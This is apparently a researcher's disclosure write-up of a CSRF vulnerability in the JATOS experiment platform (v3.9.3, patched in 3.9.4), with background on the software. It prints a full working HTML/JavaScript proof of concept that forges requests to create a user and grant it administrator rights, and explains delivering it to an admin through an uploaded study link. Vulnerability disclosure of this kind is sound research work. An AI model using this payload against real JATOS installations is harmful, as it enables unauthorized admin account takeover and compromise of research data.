CVE-2024–51381 | JATOS v3.9.3 CSRF | Admin Account Creation
Introduction to CVE #3
CVE #3 identifies a critical security vulnerability in the application that poses substantial risks to user data and system integrity. This Cross-Site Request Forgery (CSRF) flaw allows an attacker to perform actions typically reserved for administrators, potentially leading to unauthorized activities and the creation of admin accounts.
What is JATOS
JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.
The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.
One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.
JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. Speaking with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It’s an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.
I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.4.
Exploitation Phase
Now that you have a clear understanding of what JATOS is, let’s delve deeper into the specifics of this CVE and examine how an attacker might exploit it.
Take note that to exploit CSRF, you will need XSS, as the cookies are set to Lax, preventing them from being sent cross-site. This means you must be on the same site to carry out the CSRF attack.
To exploit the CSRF vulnerability, we can leverage JATOS’s built-in functionality that allows for importing .HTML files. Typically, these HTML files contain the studies that participants interact with. However, in this case, we will insert malicious JavaScript code that executes the CSRF attack when an administrator visits the page.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Post Request via iframe</title>
</head>
<body>
<iframe name="postIframe" style="display:none;"></iframe>
<iframe name="postIframetimeout" style="display:none;"></iframe>
<script>
function postRequestInIframe() {
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:9000/jatos/user';
form.target = 'postIframe';
var usernameInput = document.createElement('input');
usernameInput.type = 'hidden';
usernameInput.name = 'username';
usernameInput.value = 'Hacked';
form.appendChild(usernameInput);
var nameInput = document.createElement('input');
nameInput.type = 'hidden';
nameInput.name = 'name';
nameInput.value = 'name123';
form.appendChild(nameInput);
var emailInput = document.createElement('input');
emailInput.type = 'hidden';
emailInput.name = 'email';
emailInput.value = 'email@gmail.com';
form.appendChild(emailInput);
var authByLdapInput = document.createElement('input');
authByLdapInput.type = 'hidden';
authByLdapInput.name = 'authByLdap';
authByLdapInput.value = 'false';
form.appendChild(authByLdapInput);
var passwordInput = document.createElement('input');
passwordInput.type = 'hidden';
passwordInput.name = 'password';
passwordInput.value = 'password123';
form.appendChild(passwordInput);
document.body.appendChild(form);
form.submit();
document.body.removeChild(form);
}
// Trigger the first request immediately
postRequestInIframe();
// Wait 3 seconds and trigger the second request
setTimeout(function postRequestInIframeaftertimeout() {
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost:9000/jatos/user/hacked/properties/role?role=ADMIN&value=true';
form.target = 'postIframetimeout';
document.body.appendChild(form);
form.submit();
document.body.removeChild(form);
}, 3000); // Executes after 3000ms (3 seconds)
</script>
</body>
</html>This file enables you to execute two CSRF actions: one for creating a user account and another for granting admin access.
JATOS also includes a built-in feature that attackers can exploit to facilitate this vulnerability. Specifically, it has a link creator that allows you to generate a link typically provided to participants for accessing the study and interacting with the uploaded HTML file. In this case, we will create this link and send it to the admin. Once the admin clicks on the link, the actions will be executed.
This would enable the attacker to log in with the new account as an administrator, compromising the integrity, confidentiality, and availability of the application, particularly if any studies are removed.
Related CVE References
Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.
